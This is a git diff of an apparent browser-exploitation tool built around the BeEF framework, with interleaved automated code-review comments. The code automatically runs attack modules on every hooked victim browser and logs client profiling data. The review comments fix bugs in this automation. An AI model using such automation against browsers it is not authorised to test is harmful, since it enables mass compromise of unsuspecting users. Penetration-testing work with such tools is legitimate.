diff --git a/config_files/beefautorun.cfg b/config_files/beefautorun.cfg
index f48760b..fa84f2d 100644
--- a/config_files/beefautorun.cfg
+++ b/config_files/beefautorun.cfg
@@ -1,6 +1,7 @@
 #Example config file for the BeefAutorun plugin
-mode = oneshot #can be set to loop, or oneshot
+mode = oneshot
+#can be set to loop, or oneshot
 #in loop mode the plugin will run modules on all hooked browsers every 10 seconds
 #in oneshot mode the plugin will run modules only once per hooked browser
diff --git a/libs/beefapi.py b/libs/beefapi.py
index 67e1162..099c252 100644
--- a/libs/beefapi.py
+++ b/libs/beefapi.py
@@ -18,8 +18,7 @@ class BeefAPI:
 self.log_url = self.url + "logs?token="
 def random_url(self):
- url = "".join(sample(digits + lowercase, 8))
- return url
+ return "".join(sample(digits + lowercase, 8))
 def login(self, username, password):
 try:
@@ -36,30 +35,67 @@ class BeefAPI:
 except Exception, e:
 print "beefapi ERROR: %s" % e
- def onlineSessions(self):
+ def sessions_online(self):
 return self.get_sessions("online", "session")
- def offlineSessions(self):
+ def sessions_offline(self):
 return self.get_sessions("offline", "session")
- def onlineHosts(self):
+ def session2host(self, session):
+ return self.conversion(session, "ip")
+
+ def session2id(self, session):
+ return self.conversion(session, "id")
+
+ def hook_info(self, hook): #Returns parsed information on a session
+ session = self.conversion(hook, "session")
+ url = self.hookurl + self.token
+ r = requests.get(url).json()
+
+ try:
+ states = ["online", "offline"]
+ for state in states:
+ for v in r["hooked-browsers"][state].items():
+ if v[1]["session"] == session:
+ return v[1]
+ except IndexError:
+ pass
+
+ def hook_info_all(self, hook):
+ session = self.conversion(hook, "session")
+ url = self.url + "hooks/%s?token=%s" % (session, self.token)
+ return requests.get(url).json()
+
+ def hook_logs(self, hook):
+ session = self.conversion(hook, "session")
+ url = self.url + "logs/%s?token=%s" % (session, self.token)
+ return requests.get(url).json()
+
+ def hosts_online(self):
 return self.get_sessions("online", "ip")
- def offlineHosts(self):
+ def hosts_offline(self):
 return self.get_sessions("offline", "ip")
- def get_sessions(self, state, value):
- try:
- hooks = []
- r = requests.get(self.hookurl + self.token).json()
- for v in r["hooked-browsers"][state].items():
- hooks.append(v[1][value])
+ def host2session(self, host):
+ return self.conversion(host, "session")
- return hooks
- except Exception, e:
- print "beefapi ERROR: %s" % e
+ def host2id(self, host):
+ return self.conversion(host, "id")
- def getModid(self, name): #Returns module id
+ def ids_online(self):
+ return self.get_sessions("online", "id")
+
+ def ids_offline(self):
+ return self.get_sessions("offline", "id")
+
+ def id2session(self, id):
+ return self.conversion(id,
"session") + + def id2host(self, id): + return self.conversion(id, "ip") + + def module_id(self, name): #Returns module id url = self.mod_url + self.token try: r = requests.get(url).json() @@ -69,7 +105,7 @@ class BeefAPI: except Exception, e: print "beefapi ERROR: %s" % e - def getModname(self, id): #Returns module name + def module_name(self, id): #Returns module name url = self.mod_url + self.token try: r = requests.get(url).json() @@ -79,47 +115,9 @@ class BeefAPI: except Exception, e: print "beefapi ERROR: %s" % e - def host2session(self, ip): #IP => Session - url = self.hookurl + self.token - try: - r = requests.get(url).json() - for v in r["hooked-browsers"]["online"].items(): - if v[1]["ip"] == ip: - return v[1]["session"] - else: - session = None - - if session is None: - for v in r["hooked-browsers"]["offline"].items(): - if v[1]["ip"] == ip: - return v[1]["session"] - else: - return None - - except Exception, e: - print "beefapi ERROR: %s" % e - - def session2host(self, session): #Session => IP - url = self.hookurl + self.token - try: - r = requests.get(url).json() - for v in r["hooked-browsers"]["online"].items(): - if v[1]["session"] == session: - return v[1]["ip"] - else: - ip = None - - if ip is None: - for v in r["hooked-browsers"]["offline"].items(): - if v[1]["session"] == session: - return v[1]["ip"] - else: - return None - except Exception, e: - print "beefapi ERROR: %s" % e - - def runModule(self, session, mod_id, options={}): #Executes a module on a specified session + def module_run(self, hook, mod_id, options={}): #Executes a module on a specified session try: + session = self.conversion(hook, "session") headers = {"Content-Type": "application/json", "charset": "UTF-8"} payload = json.dumps(options) url = self.url + "modules/%s/%s?token=%s" % (session, mod_id, self.token) 
@@ -127,24 +125,45 @@ class BeefAPI:
 except Exception, e:
 print "beefapi ERROR: %s" % e
- def moduleResult(self, session, mod_id, cmd_id):
+ def module_results(self, hook, mod_id, cmd_id):
+ session = self.conversion(hook, "session")
 url = self.mod_url + "%s/%s/%s?token=%s" % (session, mod_id, cmd_id, self.token)
 return requests.get(url).json()
- def sessionInfo(self, session): #Returns parsed information on a session
- url = self.url + "hooks/%s?token=%s" % (session, self.token)
+ def modules_list(self):
+ return requests.get(self.mod_url + self.token).json()
+
+ def module_info(self, id):
+ url = self.url + "modules/%s?token=%s" % (id, self.token)
 return requests.get(url).json()
 def logs(self):
 return requests.get(self.log_url + self.token).json()
- def sessionLogs(self, session):
- url = self.url + "logs/%s?token=%s" % (session, self.token)
- return requests.get(url).json()
+ def conversion(self, value, return_value): #Helper function for all conversion functions
+ url = self.hookurl + self.token
+ try:
+ r = requests.get(url).json()
+ states = ["online", "offline"]
+ for state in states:
+ for v in r["hooked-browsers"][state].items():
+ for r in v[1].values():
+ if str(value) == str(r):
+ return v[1][return_value]
- def listModules(self):
- return requests.get(self.mod_url + self.token).json()
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
- def moduleInfo(self, id):
- url = self.url + "modules/%s?token=%s" % (id, self.token)
- return requests.get(url).json()
+ except IndexError:
+ pass
+
+ def get_sessions(self, state, value): #Helper function
+ try:
+ hooks = []
+ r = requests.get(self.hookurl + self.token).json()
+ for v in r["hooked-browsers"][state].items():
+ hooks.append(v[1][value])
+
+ return hooks
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py
index 5df1995..0edbcd9 100644
--- a/plugins/BeefAutorun.py
+++ b/plugins/BeefAutorun.py
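Review bot: In `conversion` (libs/beefapi.py) the inner loop `for r in v[1].values():` rebinds `r`, the parsed response, so once the "online" pass has inspected a hook without matching, the "offline" pass evaluates `r["hooked-browsers"]` on a field value and raises; the broad handler prints the error and the lookup returns None. The second handler, `except IndexError`, can never run because it follows `except Exception`. Comparing `value` with every field of a hook also means an id such as `1` can match a different hook whose unrelated field has the same text, so the returned session may belong to the wrong browser. The version below keeps the response under its own name and compares only the fields the wrappers pass in; the key names come from the `get_sessions` calls in this file.

```python
    def conversion(self, value, return_value): #Helper function for all conversion functions
        url = self.hookurl + self.token
        try:
            hooked = requests.get(url).json()["hooked-browsers"]
            for state in ("online", "offline"):
                for hook in hooked[state].values():
                    for field in ("session", "ip", "id"):
                        if field in hook and str(hook[field]) == str(value):
                            return hook[return_value]
        except Exception, e:
            print "beefapi ERROR: %s" % e
```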
@@ -37,54 +37,51 @@ class BeefAutorun(Plugin):
 userconfig = ConfigObj(self.autoruncfg)
 self.Mode = userconfig['mode']
- if self.Mode == 'oneshot':
- print '[*] Setting mode to oneshot'
- elif self.Mode == 'loop':
- print '[*] Setting mode to loop'
- else:
- sys.exit("[-] Error: unrecognized mode set in config file")
 self.All_modules = userconfig["ALL"]
 self.Targeted_modules = userconfig["targets"]
- print "[*] BeEFAutorun plugin online"
+ print "[*] BeEFAutorun plugin online => Mode: %s" % self.Mode
 t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
 t.setDaemon(True)
 t.start()
 def autorun(self, beef):
- already_hooked = []
 already_ran = []
+ already_hooked = []
 while True:
- sessions = beef.onlineSessions()
+ sessions = beef.sessions_online()
 if len(sessions) > 0:
 for session in sessions:
- session_ip = beef.session2host(session)
+
 if session not in already_hooked:
- logging.info("%s >> joined the horde!" % session_ip)
+ info = beef.hook_info(session)
+ logging.info("%s >> joined the horde!
[id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
 already_hooked.append(session)
 if self.Mode == 'oneshot':
 if session not in already_ran:
- self.execModules(session, session_ip, beef)
+ self.execModules(session, beef)
 already_ran.append(session)
 elif self.Mode == 'loop':
- self.execModules(session, session_ip, beef)
+ self.execModules(session, beef)
 sleep(10)
 else:
 sleep(1)
- def execModules(self, session, session_ip, beef):
- session_browser = beef.sessionInfo(session)["BrowserName"]
- session_os = beef.sessionInfo(session)["OsName"]
+ def execModules(self, session, beef):
+ session_info = beef.hook_info(session)
+ session_ip = session_info['ip']
+ hook_browser = session_info['name']
+ hook_os = session_info['os']
 if len(self.All_modules) > 0:
 logging.info("%s >> sending generic modules" % session_ip)
 for module, options in self.All_modules.items():
- mod_id = beef.getModid(module)
- resp = beef.runModule(session, mod_id, json.loads(options))
+ mod_id = beef.module_id(module)
+ resp = beef.module_run(session, mod_id, json.loads(options))
 if resp["success"] == 'true':
 logging.info('%s >> sent module %s' % (session_ip, mod_id))
 else:
@@ -93,16 +90,16 @@ class BeefAutorun(Plugin):
 logging.info("%s >> sending targeted modules" % session_ip)
 for os in self.Targeted_modules:
- if (os in session_os) or (os == session_os):
+ if (os in hook_os) or (os == hook_os):
 browsers = self.Targeted_modules[os]
 if len(browsers) > 0:
 for browser in browsers:
- if browser == session_browser:
+ if browser == hook_browser:
 modules = self.Targeted_modules[os][browser]
 if len(modules) > 0:
 for module, options in modules.items():
- mod_id = beef.getModid(module)
- resp = beef.runModule(session, mod_id, json.loads(options))
+ mod_id = beef.module_id(module)
+ resp = beef.module_run(session, mod_id, json.loads(options))
 if resp["success"] == 'true':
 logging.info('%s >> sent module %s' % (session_ip, mod_id))
 else:
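Review bot: `info = beef.hook_info(session)` in `autorun` and `session_info = beef.hook_info(session)` in `execModules` are subscripted without a check, but `hook_info` as added in libs/beefapi.py falls through and returns None when no hook matches. A hook that drops between `sessions_online()` and the lookup would then raise TypeError inside the daemon thread, which ends the autorun loop without any message. Guard both call sites, e.g. `if info is None: continue` in the loop and `if session_info is None: return` in `execModules`. Separately, with the mode validation removed an unrecognized `mode` value matches neither branch and no modules run, so consider keeping `if self.Mode not in ('oneshot', 'loop'): sys.exit("[-] Error: unrecognized mode set in config file")`. The body of `execModules` continues past the end of this hunk.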
diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py
index 752b77c..d9d4639 100644
--- a/plugins/BrowserProfiler.py
+++ b/plugins/BrowserProfiler.py
@@ -29,8 +29,10 @@ class BrowserProfiler(Inject, Plugin):
 if 'clientprfl' in request.uri:
 self.dic_output = self.post2dict(request.postData)
 self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client
+ if self.dic_output['plugin_list'] > 0:
+ self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',')
 pretty_output = pformat(self.dic_output)
- logging.warning("%s Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
+ logging.warning("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
 def get_payload(self):
 payload = """
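Review bot: The guard `if self.dic_output['plugin_list'] > 0:` compares a value taken from the POST body with an integer, which under Python 2 (used by the rest of this commit) is always true for a string, and it raises KeyError when the request carries no `plugin_list` field. The field comes from the profiled client, so it should be treated as optional and possibly empty: `plugins = self.dic_output.get('plugin_list')` followed by `if plugins: self.dic_output['plugin_list'] = plugins.split(',')`. The enclosing handler starts above the hunk, so whether `post2dict` can return non-string values is not visible here.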